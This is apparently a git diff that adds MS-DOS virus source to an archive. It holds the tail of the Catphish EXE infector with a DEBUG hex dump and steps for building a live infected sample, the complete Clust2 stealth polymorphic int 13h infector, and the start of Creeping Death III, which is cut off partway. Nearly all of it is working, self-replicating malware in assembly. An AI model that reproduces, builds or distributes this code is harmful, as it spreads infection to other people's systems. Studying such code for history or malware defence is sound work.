header size + mov cx, 10h ; DX:AX/CX = AX Remainder DX + div cx + + + mov word ptr [buffer+14h-100h], dx ; IP Offset + mov word ptr [buffer+16h-100h], ax ; CS Displacement in module + + + mov word ptr [buffer+0Eh-100h], ax ; Paragraph disp. SS + mov word ptr [buffer+10h-100h], 0A000h ; Starting SP + + pop ax + pop dx + + add ax, endcode-start ; add virus size + cmp ax, endcode-start + jb fix_fault + jmp execont + + +war_cry db 'Cry Havoc, and let slip the Dogs of War!',0 +v_name db '[Catphish]',0 ; Virus name. +v_author db 'FirstStrike',0 ; Me. +v_stuff db 'Kraft!',0 + + +fix_fault: + add dx,1d + +execont: + push ax + mov cl, 9 + shr ax, cl + ror dx, cl + stc + + adc dx, ax + pop ax + and ah, 1 + + + mov word ptr [buffer+4-100h], dx ; Fix-up the file size in + mov word ptr [buffer+2-100h], ax ; the EXE header. + + pop bx + retn ; Leave subroutine + +;---------------------------------------------------------------------------- + + +check_if_resident: + push es + xor ax,ax + mov es,ax + + cmp word ptr es:[63h*4],0040h ; Check to see if virus + jnz grab_da_vectors ; is already resident + jmp exit_normal ; by looking for a 40h + ; signature in the int 63h + ; offset section of + ; interrupt table. + +grab_da_vectors: + + mov ax,3521h ; Store original int 21h + int 21h ; vector pointer. + mov word ptr cs:[bp+dos_vector-100h],bx + mov word ptr cs:[bp+dos_vector+2-100h],es + + + +load_high: + push ds + +find_chain: ; Load high routine that + ; uses the DOS internal + mov ah,52h ; table function to find + int 21h ; start of MCB and then + ; scales up chain to + mov ds,es: word ptr [bx-2] ; find top. (The code + assume ds:nothing ; is long, but it is the + ; only code that would + xor si,si ; work when an infected + ; .EXE was to be loaded +Middle_check: ; into memory. + + cmp byte ptr ds:[0],'M' + jne Check4last + +add_one: + mov ax,ds + add ax,ds:[3] + inc ax + + mov ds,ax + jmp Middle_check + +Check4last: + cmp byte ptr ds:[0],'Z' + jne Error + mov byte ptr ds:[0],'M' + sub word ptr ds:[3],(endcode-start+15h)/16h+1 + jmp add_one + +error: + mov byte ptr ds:[0],'Z' + mov word ptr ds:[1],008h + mov word ptr ds:[3],(endcode-start+15h)/16h+1 + + push ds + pop ax + inc ax + push ax + pop es + + + + + +move_virus_loop: + mov bx,offset start-100h ; Move virus into carved + add bx,bp ; out location in memory. + mov cx,endcode-start + push bp + mov bp,0000h + +move_it: + mov dl, byte ptr cs:[bx] + mov byte ptr es:[bp],dl + inc bp + inc bx + loop move_it + pop bp + + + +hook_vectors: + + mov ax,2563h ; Hook the int 21h vector + mov dx,0040h ; which means it will + int 21h ; point to virus code in + ; memory. + mov ax,2521h + mov dx,offset virus_attack-100h + push es + pop ds + int 21h + + + + + pop ds + + + +exit_normal: ; Return control to + pop es ; infected .EXE + mov ax, es ; (Dark Angle code.) + add ax, 10h + add word ptr cs:[bp+OrigCSIP+2-100h], ax + + cli + add ax, word ptr cs:[bp+OrigSSSP+2-100h] + mov ss, ax + mov sp, word ptr cs:[bp+OrigSSSP-100h] + sti + + xor ax,ax + xor bp,bp + +endcrypt label byte + + db 0eah +OrigCSIP dd 0fff00000h +OrigSSSP dd ? + +exe_attrib dw ? +date_stamp dw ? +time_stamp dw ? + + + +dos_vector dd ? + +buffer db 18h dup(?) ; .EXE header buffer. + + + + +;---------------------------------------------------------------------------- + + +virus_attack proc far + assume cs:code,ds:nothing, es:nothing + + + cmp ax,4b00h ; Infect only on file + jz run_kill ; executions. + +leave_virus: + jmp dword ptr cs:[dos_vector-100h] + + + +run_kill: + call infectexe + jmp leave_virus + + + + + +infectexe: ; Same old working horse + push ax ; routine that infects + push bx ; the selected file. + push cx + push es + push dx + push ds + + + + mov cx,64d + mov bx,dx + +findname: + cmp byte ptr ds:[bx],'.' + jz o_k + inc bx + loop findname + +pre_get_out: + jmp get_out + +o_k: + cmp byte ptr ds:[bx+1],'E' ; Searches for victims. + jnz pre_get_out + cmp byte ptr ds:[bx+2],'X' + jnz pre_get_out + cmp byte ptr ds:[bx+3],'E' + jnz pre_get_out + + + + +getexe: + mov ax,4300h + call dosit + + mov word ptr cs:[exe_attrib-100h],cx + + mov ax,4301h + xor cx,cx + call dosit + +exe_kill: + mov ax,3d02h + call dosit + xchg bx,ax + + mov ax,5700h + call dosit + + mov word ptr cs:[time_stamp-100h],cx + mov word ptr cs:[date_stamp-100h],dx + + + + push cs + pop ds + + mov ah,3fh + mov cx,18h + mov dx,offset buffer-100h + call dosit + + cmp word ptr cs:[buffer+12h-100h],1993h ; Looks for virus marker + jnz infectforsure ; of 1993h in .EXE + jmp close_it ; header checksum + ; position. +infectforsure: + call move_f_ptrfar + + push ax + push dx + + + call store_header + + pop dx + pop ax + + call infect_header + + + push bx + push cx + push dx + + + mov bx,offset infect_header-100h + mov cx,(endcrypt)-(infect_header) + +rol_em: ; Encryption via + mov dl,byte ptr cs:[bx] ; rotating left. + rol dl,1 + mov byte ptr cs:[bx],dl + inc bx + loop rol_em + + pop dx + pop cx + pop bx + + mov ah,40h + mov cx,endcode-start + mov dx,offset start-100h + call dosit + + + mov word ptr cs:[buffer+12h-100h],1993h + + + call move_f_ptrclose + + mov ah,40h + mov cx,18h + mov dx,offset buffer-100h + call dosit + + mov ax,5701h + mov cx,word ptr cs:[time_stamp-100h] + mov dx,word ptr cs:[date_stamp-100h] + call dosit + +close_it: + + + mov ah,3eh + call dosit + +get_out: + + + pop ds + pop dx + +set_attrib: + mov ax,4301h + mov cx,word ptr cs:[exe_attrib-100h] + call dosit + + + pop es + pop cx + pop bx + pop ax + + retn + +;---------------------------------- Call to DOS int 21h --------------------- + +dosit: ; DOS function call code. + pushf + call dword ptr cs:[dos_vector-100h] + retn + +;---------------------------------------------------------------------------- + + + + + + + + + + +;-------------------------------- Store Header ----------------------------- + +store_header: + les ax, dword ptr [buffer+14h-100h] ; Save old entry point + mov word ptr [OrigCSIP-100h], ax + mov word ptr [OrigCSIP+2-100h], es + + les ax, dword ptr [buffer+0Eh-100h] ; Save old stack + mov word ptr [OrigSSSP-100h], es + mov word ptr [OrigSSSP+2-100h], ax + + retn + +;--------------------------------------------------------------------------- + + + + + + +;---------------------------------- Set file pointer ------------------------ + +move_f_ptrfar: ; Code to move file pointer. + mov ax,4202h + jmp short move_f + +move_f_ptrclose: + mov ax,4200h + +move_f: + xor dx,dx + xor cx,cx + call dosit + retn + +;---------------------------------------------------------------------------- + + +endcode label byte + +endp + +code ends +end start + + +>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< + + Below is a sample file that is already infected. + Just cut out code and run through debug. Next rename + DUMMY.FIL to DUMMY.EXE and you have a working copy of + your very own Catphish virus. + + +N DUMMY.FIL +E 0100 4D 5A 93 00 06 00 00 00 20 00 00 00 FF FF 5E 00 +E 0110 00 A0 93 19 0D 00 5E 00 3E 00 00 00 01 00 FB 30 +E 0120 6A 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0130 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0160 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0170 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0190 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 01A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 01B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 01C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 01D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 01E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 01F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0200 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0210 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0220 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0230 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0240 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0250 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0270 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0280 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0290 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 02A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 02B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 02C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 02D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 02E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 02F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0300 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0310 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0320 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0330 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0340 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0350 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0360 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0370 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0380 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0390 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 03A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 03B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 03C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 03D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 03E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 03F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0400 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0410 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0420 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0430 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0440 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0450 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0460 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0470 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0480 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0490 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 04A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 04B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 04C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 04D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 04E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 04F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +E 0500 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0510 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0520 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0530 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0540 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0550 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0560 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0570 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0580 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0590 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 05A0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 05B0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 05C0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 05D0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 05E0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 05F0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0600 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0610 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0620 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0630 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0640 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0650 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0660 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0670 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0680 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0690 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 06A0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 06B0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 06C0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 06D0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 06E0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 06F0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0700 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0710 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0720 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0730 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0740 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0750 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0760 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0770 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0780 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0790 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 07A0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 07B0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 07C0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 07D0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 07E0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 07F0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0800 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0810 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0820 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0830 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0840 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0850 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0860 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0870 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0880 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 0890 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 08A0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 08B0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 08C0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 08D0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 +E 08E0 90 90 90 90 90 90 90 90 B8 00 4C CD 21 E8 00 00 +E 08F0 5D 81 ED 03 00 90 90 90 BB 21 00 03 DD B9 41 01 +E 0900 2E 8A 17 D0 CA 2E 88 17 43 E2 F5 E9 93 00 A6 A4 +E 0910 A0 17 3C FA 02 63 08 A7 C7 56 87 07 B5 00 73 20 +E 0920 00 EF E3 13 2C 13 02 47 17 02 47 07 02 8F 0C 0B +E 0930 02 00 41 B0 B4 0A 4D 04 7A 4D 04 E4 94 D7 96 21 +E 0940 86 E4 F2 40 90 C2 EC DE C6 58 40 C2 DC C8 40 D8 +E 0950 CA E8 40 E6 D8 D2 E0 40 E8 D0 CA 40 88 DE CE E6 +E 0960 40 DE CC 40 AE C2 E4 42 00 B6 86 C2 E8 E0 D0 D2 +E 0970 E6 D0 BA 00 8C D2 E4 E6 E8 A6 E8 E4 D2 D6 CA 00 +E 0980 96 E4 C2 CC E8 42 00 07 85 02 A0 63 12 A7 D1 A7 +E 0990 95 F3 26 A1 B0 01 C9 02 13 2C F2 02 47 EE 02 B6 +E 09A0 87 0C 66 81 1D 81 4C 07 7C 19 02 80 EA 06 D3 03 +E 09B0 00 71 42 6A 9B 42 5C 13 3D E2 02 5C 19 0D E6 02 +E 09C0 3C 69 A4 9B 42 4C 1D BE FD 66 ED 01 7C 00 00 9A +E 09D0 EA 16 19 B1 06 0C 06 00 80 1D B1 D7 DD 01 7C 00 +E 09E0 00 B4 EA 1A 8D 0C 00 00 9A 07 5C 06 00 40 21 D7 +E 09F0 C3 8D 0C 00 00 B4 8F 0C 02 00 10 00 8F 0C 06 00 +E 0A00 40 00 3C B0 80 A0 0E 77 00 00 06 BB 73 4D 04 AA +E 0A10 7B 00 00 5C 15 2E 4C 11 AC 00 8A 86 C5 EB BA 71 +E 0A20 C6 4A 75 80 00 9B 42 71 42 4A 75 1B 02 0C 3E 9B +E 0A30 42 3E 0E 19 81 0A 20 00 5C 02 0D CA 02 F5 5C 06 +E 0A40 0D D2 02 1D A1 5C 17 4D CE 02 F7 66 81 66 DB EA +E 0A50 00 01 10 00 00 01 00 00 20 00 97 19 5A 0B 92 14 +E 0A60 1D 07 4D 5A 93 00 06 00 00 00 20 00 00 00 FF FF +E 0A70 5E 00 00 A0 00 00 0D 00 5E 00 3D 00 4B 74 05 2E +E 0A80 FF 2E 71 01 E8 02 00 EB F6 50 53 51 06 52 1E B9 +E 0A90 40 00 8B DA 80 3F 2E 74 06 43 E2 F8 E9 AE 00 80 +E 0AA0 7F 01 45 75 F7 80 7F 02 58 75 F1 80 7F 03 45 75 +E 0AB0 EB B8 00 43 E8 A8 00 2E 89 0E 6B 01 B8 01 43 33 +E 0AC0 C9 E8 9B 00 B8 02 3D E8 95 00 93 B8 00 57 E8 8E +E 0AD0 00 2E 89 0E 6F 01 2E 89 16 6D 01 0E 1F B4 3F B9 +E 0AE0 18 00 BA 75 01 E8 77 00 2E 81 3E 87 01 93 19 75 +E 0AF0 03 EB 55 90 E8 8C 00 50 52 E8 6A 00 5A 58 E8 0D +E 0B00 FE 53 51 52 BB 21 00 B9 41 01 2E 8A 17 D0 C2 2E +E 0B10 88 17 43 E2 F5 5A 59 5B B4 40 B9 A6 02 BA 00 00 +E 0B20 E8 3C 00 2E C7 06 87 01 93 19 E8 5B 00 B4 40 B9 +E 0B30 18 00 BA 75 01 E8 27 00 B8 01 57 2E 8B 0E 6F 01 +E 0B40 2E 8B 16 6D 01 E8 17 00 B4 3E E8 12 00 1F 5A B8 +E 0B50 01 43 2E 8B 0E 6B 01 E8 05 00 07 59 5B 58 C3 9C +E 0B60 2E FF 1E 71 01 C3 2E C4 06 89 01 2E A3 63 01 2E +E 0B70 8C 06 65 01 2E C4 06 83 01 2E 8C 06 67 01 2E A3 +E 0B80 69 01 C3 B8 02 42 EB 03 B8 00 42 33 D2 33 C9 E8 +E 0B90 CD FF C3 +RCX +0A93 +W +Q + + + -+- FirstStrike -+- diff --git a/MSDOS/Virus.MSDOS.Unknown.cclust2.asm b/MSDOS/Virus.MSDOS.Unknown.cclust2.asm new file mode 100644 index 00000000..f088f0cf --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cclust2.asm @@ -0,0 +1,279 @@ +;The Circus Cluster 2 virus is an experiment which TridenT finished after +;the original Cluster virus was published in Crypt 17. The source +;code in its original form is provided now. +; +;Credited to TridenT, Circus Cluster 2 uses some of +;the ideas of the Bulgarian virus known as The Rat. The Rat was deemed +;tricky because it looked for "00" empty space below the header in +;an EXEfile - if it found enough room for itself, it wrote itself out +;to the empty space or "air" in the file. This hid the virus in the +;file, but added no change in file size. This is a nice theme - one +;made famous by the ZeroHunt virus which first did the same with +;.COMfiles. In both cases, the viruses had to be picky about the +;files they infected, limiting their spread. This is still true with +;Circus Cluster 2 - it's an effective virus, but an extremely picky +;one. +; +;First, Circus Cluster 2 will attempt to copy itself into +;the "air" in an EXEfile just below the file header, if there is +;enough room. The most common candidates for infection are standard +;MS/PC-DOS utility programs, like FIND or FC, among others. +; +; +; +;Because Circus Cluster installs its own INT 13 disk hander, it then can +;intercept all attempts to read from files for a quick look. +;For example, looking at a hex dump of a Cluster-infected .EXE, +;with Vern Berg's LIST, will show the files clean. Now, boot +;the system clean and look again. You'll see Cluster in the file's +;"00" space. +; +;Additional notes by Black Wolf & Urnst Kouch +;Crypt Newsletter 22. Circus Cluster 2 can be quickly assembled with +;the A86 shareware assembler. +;---------------------------------------------------------------------- +; +; Clust2 virus by John Tardy / TridenT +; +; Virus Name: Clust2 +; Aliases: Cluster-II, Circus Clusters-II +; V Status: Released +; Discovery: Not (yet) +; Symptoms: .EXE altered, possible "sector not found" errors on disk-drives, +; decrease in aveable memory +; Origin: The Netherlands +; Eff Length: 386 bytes (EXE size doesn't change) +; Type Code: ORhE - Overwriting Resident .EXE Infector +; Detection Method: +; Removal Instructions: Delete infected files or copy infected files with the +; virus resident to a device driven unit. +; +; General Comments: +; The Clust2 virus is not yet submitted to any antiviral authority. It +; is from the TridenT Virus Research Centre and was written by someone +; calling himself John Tardy. When an infected program is started, Clust2 +; will become resident in high memory, but below TOM. It hooks interrupt +; 13h and will try to load the program again. Because of its stealth +; abilities the original program is loaded and will execute normally. +; The Clust2 virus infects files when a write request for interrupt 13h +; is done. It will check if the buffer contains the 'MZ' signature and +; that the candidate file isn't larger than 65000 bytes, and if there are +; enough zeros in the EXE-header. If these conditions are met, Clust2 +; will convert the EXE file to a COM file and inserts its code in the +; buffer, allowing the original write request to proceed. This way it +; evades critical errors. The Clust2 virus is also stealth and can't be +; detected with virus scanners or checksumming software if the virus is +; resident. File-length and date doesn't change regardless if Clust2 +; is resident. It's also a slighty polymorphic virus, mutating a few +; bytes in its decryptor. A wildcarded search string is needed to find it. +; The following text is encrypted within the +; virus: +; +; "[Clust2]" +; "JT / TridenT" +; +; The Clust2 virus will not infect files on device driven units, like drives +; compressed with DoubleSpace. It will disinfect itself on the fly +; when copied to such a device. +; +; Sometimes it will issue a "sector not found" error when a file is +; copied to a disk drive. +; +; The Clust2 virus doesn't do anything beside replicate. +; + ORG 100H + +JUMPIE: JMP SHORT JUMPER + + ORG 180H + +JUMPER: CLC + MOV CX,DECRLEN +MORPH EQU $-2 +JASS: LEA SI,DECR +DECRYPT: XOR BYTE PTR [SI],0 +TRIG EQU $-1 +TRAG EQU $-2 +TROG: INC SI +TREG: LOOP DECRYPT + +DECR: MOV AX,3513H + INT 21H ; return interrupt 13h handler + MOV OLD13,BX ; segment: offset + MOV OLD13[2],ES + MOV AX,ES:[BX] + CMP AX,0FC80H ; compare with virus ID + JE EXIT ; terminate if virus resident + +DOINST: MOV AH,0DH ; empty disk buffers + INT 21H + + MOV AX,CS + DEC AX + MOV DS,AX + CMP BYTE PTR DS:[0],'Z' ; last chain? + JNE EXIT ; if not, terminate +RESIT: SUB WORD PTR DS:[3],VIRPAR+19H ; subtract from MCB size + SUB WORD PTR DS:[12H],VIRPAR+19H ; subtract from + LEA SI,JUMPER ; PSP top of memory + MOV DI,SI + MOV ES,DS:[12H] ; ES = new segment + MOV DS,CS + MOV CX,VIRLEN ; virus length + REP MOVSB ; copy it into memory + + MOV AX,2513H ; + MOV DS,ES + LEA DX,NEW13 ; set interrupt 13h + INT 21H ; into virus + + PUSH CS + POP ES + MOV BX,100H + MOV SP,BX + MOV AH,4AH + INT 21H ; modify memory allocation + PUSH CS + POP DS + MOV BX,DS:[2CH] + MOV ES,BX + MOV AH,49H + INT 21H + + XOR AX,AX + MOV DI,1 +SEEK: DEC DI ; seek for file executed + SCASW ; in environment + JNE SEEK ; located after two 0's + + LEA SI,DS:[DI+2] +EXEC: PUSH BX + PUSH CS + POP DS ; ds = environment segment + MOV BX,OFFSET PARAM + MOV DS:[BX+4],CS + MOV DS:[BX+8],CS + MOV DS:[BX+12],CS + POP DS + PUSH CS + POP ES + + MOV DI,OFFSET FILENAME + PUSH DI + MOV CX,40 + REP MOVSW + PUSH CS + POP DS + + POP DX + + MOV AX,4B00H ; load & execute file + INT 21H +EXIT: MOV AH,4DH ; + INT 21H + MOV AH,4CH + INT 21H + +OLD13 DW 0,0 + +ORG13: JMP D CS:[OLD13] ; jump to old interrupt 13h + +NEW13: CMP AH,3 ; is there a write to the disk? + JE CHECKEXE ; if so, check for infection op. + CMP AH,2 ; is it a disk read? + JNE ORG13 ; if not, to original int 13h +DO: PUSHF + CALL D CS:[OLD13] ; call interrupt 13h + CMP ES:[BX],7EEBH ; is sector infected? + JNE ERROR + MOV ES:[BX],'ZM' ; cover virus ID with 'MZ' + PUSH DI + PUSH CX + PUSH AX + + MOV CX,VIRLEN + XOR AX,AX + LEA DI,BX[80H] ; hash virus from sector when read + REP STOSB + + POP AX + POP CX + POP DI +ERROR: IRET + +CHECKEXE: CMP ES:[BX],'ZM' ; is an .EXEfile being written? + JNE ORG13 ; to original address if not + + CMP W ES:BX[4],(65000/512) ; is .EXEfile too large to + JNB ORG13 ; convert? Compare with value + ; = max size (6500) divided by + ; sector size + PUSH AX + PUSH CX + PUSH SI + PUSH DI + PUSH DS + + PUSH ES + POP DS + LEA SI,BX[80H] ; look in the .EXEfile header + MOV DI,SI + MOV CX,VIRLEN +FIND0: LODSB + OR AL,AL + LOOPE FIND0 ; check if field was hashed to 0's + OR CX,CX ; and exit + JNE NO0 ; if not + + XOR AX,AX + MOV DS,AX + MOV AX,DS:[046CH] + PUSH CS + POP DS + TEST AH,1 + JZ NOLOOPFLIP + XOR B TREG,2 +NOLOOPFLIP: TEST AH,2 + JZ NOCLCFLIP + XOR B JUMPER,1 +NOCLCFLIP: + ADD AX,VIRLEN + SHR AX,1 + MOV W MORPH,AX + MOV B TRIG,AH + XOR B TRAG,1 + XOR B JASS,1 + XOR B TROG,1 + MOV CX,CRYPT + LEA SI,JUMPER + REP MOVSB + MOV CX,DECRLEN + LEA SI,DECR +CODEIT: LODSB + XOR AL,AH + STOSB ; copy virus over 'air' in EXEheader + LOOP CODEIT ; after encrypting + MOV DI,BX + MOV AX,07EEBH ; insert jmp over original 'MZ' + STOSW + +NO0: POP DS + POP DI + POP SI + POP CX + POP AX + JMP ORG13 + + DB '[Clust2]' + +PARAM DW 0,80H,?,5CH,?,6CH,? + + DB 'JT / TridenT' + +FILENAME EQU $ +DECRLEN EQU $-DECR +CRYPT EQU DECR-JUMPER +VIRLEN EQU $-JUMPER +VIRPAR EQU ($-JUMPER)/16 + + diff --git a/MSDOS/Virus.MSDOS.Unknown.cdeath3.asm b/MSDOS/Virus.MSDOS.Unknown.cdeath3.asm new file mode 100644 index 00000000..5ee07186 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cdeath3.asm @@ -0,0 +1,631 @@ +;*****************************************************************************; +; ; +; Creeping Death III (Encrypting, try to find it) ; +; ; +; (c) Copyright 1992 by Bit Addict ; +; ; +;*****************************************************************************; + +code segment public 'code' + assume cs:code, ds:code, es:code, ss:code + +;*****************************************************************************; +; ; +; Data ; +; ; +;*****************************************************************************; + + org 5ch ; use the space reserved for + ; the fcbs and command line + ; for more inportant data, + ; because we won't need this + ; data when the virus is + ; installed + +EncryptWrite2: db 36 dup(?) ; Encrypt DoRequest Encrypt + +BPB_Buf db 32 dup(?) ; buffer for BPB + +Request equ this dword ; address of the request header +RequestOffset dw ? +RequestSegment dw ? + + + org 100h ; com-file starts at offset 100 + ; hex + +;*****************************************************************************; +; ; +; Actual start of virus. In this part the virus initializes the stack and ; +; adjusts the device driver used by dos to read and write from floppy's and ; +; hard disks. Then it will start the orginal exe or com-file ; +; ; +;*****************************************************************************; + +Encrypt: mov si,offset Main-1 ; this part of the program + mov cx,400h-11 ; will decode the encoded +Repeat: xor byte ptr [si],0 ; program, so it can be + inc si ; executed + loop Repeat + +Main: mov sp,600h ; init stack + inc word ptr Counter + +;*****************************************************************************; +; ; +; Get dosversion, if the virus is running with dos 4+ then si will be 0 else ; +; si will be -1 ; +; ; +;*****************************************************************************; + +DosVersion: mov ah,30h ; fn 30h = Get Dosversion + int 21h ; int 21h + cmp al,4 ; major dosversion + sbb di,di + mov byte ptr drive[2],-1 ; set 2nd operand of cmp ah,?? + +;*****************************************************************************; +; ; +; Adjust the size of the codesegment, with dos function 4ah ; +; ; +;*****************************************************************************; + + mov bx,60h ; Adjust size of memory block + mov ah,4ah ; to 60 paragraphs = 600h bytes + int 21h ; int 21h + + mov ah,52h ; get internal list of lists + int 21h ; int 